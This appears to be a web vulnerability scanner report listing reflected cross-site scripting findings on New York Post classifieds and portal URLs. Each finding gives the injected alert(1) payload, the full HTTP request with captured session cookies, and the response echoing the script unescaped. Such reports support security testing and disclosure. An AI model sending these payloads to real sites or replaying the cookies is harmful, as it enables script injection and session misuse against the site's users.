Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle43d9d"><script>alert(1)</script>cb3ffe9143a/" />
...[SNIP]...

1.205. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d140d"-alert(1)-"874e3b12df9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicled140d"-alert(1)-"874e3b12df9/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicled140d"-alert(1)-"874e3b12df9/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.206. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94da2"-alert(1)-"4da2e933c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle94da2"-alert(1)-"4da2e933c11/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle94da2"-alert(1)-"4da2e933c11/boat/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.207. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e0f"><script>alert(1)</script>b8143a09c17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle94e0f"><script>alert(1)</script>b8143a09c17/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle94e0f"><script>alert(1)</script>b8143a09c17/boat/" />
...[SNIP]...

1.208. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f2e"><script>alert(1)</script>62a9b46aed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle89f2e"><script>alert(1)</script>62a9b46aed7/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle89f2e"><script>alert(1)</script>62a9b46aed7/commercial_truck/" />
...[SNIP]...

1.209. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca932"-alert(1)-"95e05810fb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicleca932"-alert(1)-"95e05810fb1/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicleca932"-alert(1)-"95e05810fb1/commercial_truck/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.210. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c9a"-alert(1)-"1920298d3be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehiclec8c9a"-alert(1)-"1920298d3be/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehiclec8c9a"-alert(1)-"1920298d3be/motorcycle/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.211. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 300ff"><script>alert(1)</script>bf048b262db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle300ff"><script>alert(1)</script>bf048b262db/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle300ff"><script>alert(1)</script>bf048b262db/motorcycle/" />
...[SNIP]...

1.212. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a82<script>alert(1)</script>e5a8e75e2d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig84a82<script>alert(1)</script>e5a8e75e2d4/WebPortal/nypost/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig84a82<script>alert(1)</script>e5a8e75e2d4/WebPortal/nypost/hbx/hbx_original.js</p>
...[SNIP]...

1.213. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0085<script>alert(1)</script>853d668d213 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortalc0085<script>alert(1)</script>853d668d213/nypost/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortalc0085<script>alert(1)</script>853d668d213/nypost/hbx/hbx_original.js</p>
...[SNIP]...

1.214. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5f4e3<script>alert(1)</script>4626908c455 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost5f4e3<script>alert(1)</script>4626908c455/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
